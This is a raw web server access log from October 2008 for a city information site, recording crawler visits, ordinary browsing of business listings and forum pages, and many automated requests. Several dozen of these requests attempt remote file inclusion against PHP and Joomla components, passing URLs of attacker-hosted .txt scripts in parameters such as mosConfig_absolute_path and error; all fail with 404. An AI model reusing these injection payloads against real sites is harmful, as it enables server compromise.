209.80.151.196 - - [30/Oct/2008:06:26:04 -0700] "GET /logs/access_080929.log%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 831 "-" "libwww-perl/5.803" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:26:08 -0700] "GET /picgallery/displayimage.php?album=lastup&cat=0&pos=109 HTTP/1.0" 200 10051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:11 -0700] "GET /listings/listing/results.php?letter=b&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:20 -0700] "GET /listings/listing/results.php?letter=u&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:25 -0700] "GET /listings/listing/results.php?letter=s&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:29 -0700] "GET /listings/listing/results.php?letter=h&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:26:33 -0700] "GET /logs/access_080927.log/errors.php?error=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 769 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:26:33 -0700] "GET /errors.php?error=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 759 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:26:34 -0700] "GET /logs/errors.php?error=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 764 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:41 -0700] "GET /listings/listing/results.php?letter=m&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:26:48 -0700] "GET /listings/listing/results.php?letter=t&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:26:57 -0700] "GET / HTTP/1.1" 200 44270 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:06:26:59 -0700] "GET /forum2/index.php?act=Search&nav=au&CODE=show&searchid=f5346f10d9233c3892f22c622b448735&search_in=posts&result_type=posts&hl=&st=25 HTTP/1.0" 200 7708 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:27:07 -0700] "GET /logs/access_080927.log/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 769 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:27:07 -0700] "GET /errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 759 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:27:08 -0700] "GET /forum2/index.php?showtopic=105&mode=threaded&pid=475 HTTP/1.1" 200 7408 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:27:08 -0700] "GET /logs/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 764 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:27:12 -0700] "GET /forum2/index.php?showtopic=131&pid=855&mode=threaded&show=&st=0 HTTP/1.1" 200 7409 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:27:13 -0700] "GET /forum2/index.php?showtopic=63&mode=threaded&pid=1379 HTTP/1.1" 200 7408 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:27:19 -0700] "GET /listings/listing/results.php?letter=w&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:27:28 -0700] "GET /listings/listing/results.php?category_id=758 HTTP/1.1" 200 24171 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:27:39 -0700] "GET /listings/listing/results.php?letter=l&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:27:44 -0700] "GET /listings/listing/results.php?letter=no&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:27:52 -0700] "GET /listings/listing/results.php?letter=c&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.172.186.250 - - [30/Oct/2008:06:27:56 -0700] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 777 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.172.186.250 - - [30/Oct/2008:06:27:57 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
72.30.142.88 - - [30/Oct/2008:06:27:57 -0700] "GET /demolaybacolod/pmc.html HTTP/1.0" 200 13601 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
217.172.186.250 - - [30/Oct/2008:06:27:57 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 772 "-" "libwww-perl/5.805" "www.sancarloscity.org"
83.220.144.232 - - [30/Oct/2008:06:28:04 -0700] "GET /errors.php?error=https://www.ba-sat.com/sunshop/images/products/idkm.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
83.220.144.232 - - [30/Oct/2008:06:28:04 -0700] "GET /logs/access_080927.log/errors.php?error=https://www.ba-sat.com/sunshop/images/products/idkm.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.805" "www.sancarloscity.org"
83.220.144.232 - - [30/Oct/2008:06:28:04 -0700] "GET /logs/errors.php?error=https://www.ba-sat.com/sunshop/images/products/idkm.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:28:04 -0700] "GET /listings/listing/results.php?letter=g&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
92.48.83.200 - - [30/Oct/2008:06:28:07 -0700] "GET /logs/access_081003.log/errors.php?error=http://achival.cl/a/modules/xcgal/albums/idfeel.txt?? HTTP/1.1" 404 769 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:28:07 -0700] "GET /listings/listing/results.php?letter=y&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:28:10 -0700] "GET /listings/listing/results.php?letter=l&category_id=694 HTTP/1.1" 200 25085 "http://www.sancarloscity.org/listings/listing/results.php?category_id=694" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:06:28:14 -0700] "GET /logs/access_081007.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/id.txt?? HTTP/1.1" 404 789 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:28:17 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/listings/listing/results.php?letter=f&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:28:20 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?letter=f&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:28:34 -0700] "GET /logs//index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.79" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:28:34 -0700] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:28:34 -0700] "GET /logs/access_081017.log//index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:36 -0700] "GET /logs/access_080415.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:36 -0700] "GET /logs/access_080126.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:36 -0700] "GET /logs/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:36 -0700] "GET /index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:36 -0700] "GET /logs/access_080415.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:37 -0700] "GET /index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.812" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:37 -0700] "GET /logs/access_080126.log/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 768 "-" "libwww-perl/5.812" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:28:37 -0700] "GET /jodera2/viewtopic.php?p=29666 HTTP/1.1" 200 83569 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
87.94.1.95 - - [30/Oct/2008:06:28:37 -0700] "GET /logs/index.php?cat=http://www.gosgo.com/bbs/idbr.txt??? HTTP/1.1" 404 763 "-" "libwww-perl/5.812" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:28:39 -0700] "GET /jodera2/viewtopic.php?p=29730 HTTP/1.1" 200 84597 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:28:51 -0700] "GET /logs/access_080904.log//index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
82.99.30.63 - - [30/Oct/2008:06:29:06 -0700] "GET /jodera2/index.php?sid=c246e30e2f10bdb242f4750d75f35054 HTTP/1.0" 200 61600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
64.1.215.166 - - [30/Oct/2008:06:29:07 -0700] "GET /jodera2/viewtopic.php?p=15790 HTTP/1.0" 200 33166 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:29:22 -0700] "GET /logs/access_080927.log//index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:29:22 -0700] "GET /index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 758 "-" "libwww-perl/5.79" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:29:22 -0700] "GET /logs//index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.79" "www.sancarloscity.org"
123.214.171.33 - - [30/Oct/2008:06:29:26 -0700] "GET /logs/access_081003.log/errors.php?error=http://www.dindondago.it/l333tbi1tX.txt???? HTTP/1.1" 404 769 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:29:32 -0700] "GET /listings/listing/results.php?category_id=740 HTTP/1.1" 200 24337 "http://www.sancarloscity.org/listings/listing/results.php?letter=f&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:29:33 -0700] "GET /logs/access_080929.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 830 "-" "libwww-perl/5.803" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:29:39 -0700] "GET /logs/access_080415.log/index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 768 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.172.186.250 - - [30/Oct/2008:06:29:39 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.eisenbergs.com/album/xml/help.txt? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:29:45 -0700] "GET /index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 758 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:29:45 -0700] "GET /logs/index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 763 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:29:55 -0700] "GET /logs/access_080415.log/index.php?cat=http://2excel.com.au/di.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:29:56 -0700] "GET /logs/access_080126.log/index.php?cat=http://2excel.com.au/id3.txt???? HTTP/1.1" 404 768 "-" "libwww-perl/5.805" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:06:29:57 -0700] "GET /jodera2/viewtopic.php?t=138&view=next&sid=d991eb72f60b73b384b617e1b712127f HTTP/1.1" 200 32263 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:30:00 -0700] "GET /index.php?cat=http://2excel.com.au/di.txt?? HTTP/1.1" 404 758 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:30:01 -0700] "GET /logs/index.php?cat=http://2excel.com.au/di.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.805" "www.sancarloscity.org"
209.80.151.196 - - [30/Oct/2008:06:30:03 -0700] "GET /logs/access_081007.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 830 "-" "libwww-perl/5.803" "www.sancarloscity.org"
59.125.183.76 - - [30/Oct/2008:06:30:06 -0700] "GET /logs/access_081003.log//index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:13 -0700] "GET /listings/listing/results.php?category_id=718 HTTP/1.1" 200 28945 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:14 -0700] "GET / HTTP/1.1" 200 44270 "http://search.msn.com/results.aspx?q=san+carlos+city&FORM=MSNH11&mkt=en-us" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:14 -0700] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:14 -0700] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
64.22.82.135 - - [30/Oct/2008:06:30:15 -0700] "GET /logs/access_080126.log/index.php?cat=http://2excel.com.au/di.txt?? HTTP/1.1" 404 768 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:15 -0700] "GET /listings/listing/results.php?category_id=733 HTTP/1.1" 200 47168 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:16 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:18 -0700] "GET /sccinewsearch.jpg HTTP/1.1" 200 22686 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:18 -0700] "GET /frontbanner.swf HTTP/1.1" 200 547694 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:19 -0700] "GET /listings/listing/results.php?category_id=709 HTTP/1.1" 200 26705 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:20 -0700] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:20 -0700] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 8029 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:21 -0700] "GET /listings/listing/results.php?category_id=716 HTTP/1.1" 200 24409 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:24 -0700] "GET /listings/listing/results.php?category_id=721 HTTP/1.1" 200 24446 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:26 -0700] "GET /sampo/Multichannel.swf HTTP/1.1" 200 70433 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:27 -0700] "GET /listings/listing/results.php?category_id=744 HTTP/1.1" 200 28921 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:28 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 73544 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:30 -0700] "GET /listings/listing/results.php?category_id=708 HTTP/1.1" 200 24431 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.191.55.26 - - [30/Oct/2008:06:30:30 -0700] "GET /sampo/playlist.css HTTP/1.1" 200 559 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:31 -0700] "GET /listings/listing/results.php?category_id=711 HTTP/1.1" 200 31209 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:35 -0700] "GET /listings/claim.php?claimlistingid=14921 HTTP/1.1" 200 12751 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:30:35 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:37 -0700] "GET /listings/listing/results.php?category_id=705 HTTP/1.1" 200 24477 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:39 -0700] "GET /listings/listing/results.php?category_id=722 HTTP/1.1" 200 47383 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:30:45 -0700] "GET /jodera2/viewforum.php?f=1&sid=195e1b2c9dd9270645dac8235e4281ce HTTP/1.0" 200 84809 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:46 -0700] "GET /listings/listing/review.php?listing_id=14921 HTTP/1.1" 200 21095 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:47 -0700] "GET /listings/listing/results.php?category_id=696 HTTP/1.1" 200 28997 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:50 -0700] "GET /listings/listing/results.php?category_id=736 HTTP/1.1" 200 24382 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:51 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:53 -0700] "GET /listings/listing/results.php?category_id=732 HTTP/1.1" 200 31141 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:06:30:54 -0700] "GET /listings/listing/results.php?category_id=698 HTTP/1.1" 200 33523 "http://www.sancarloscity.org/listings/listing/results.php?letter=s&category_id=750" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.95 - - [30/Oct/2008:06:30:58 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.sancarloscity.org"
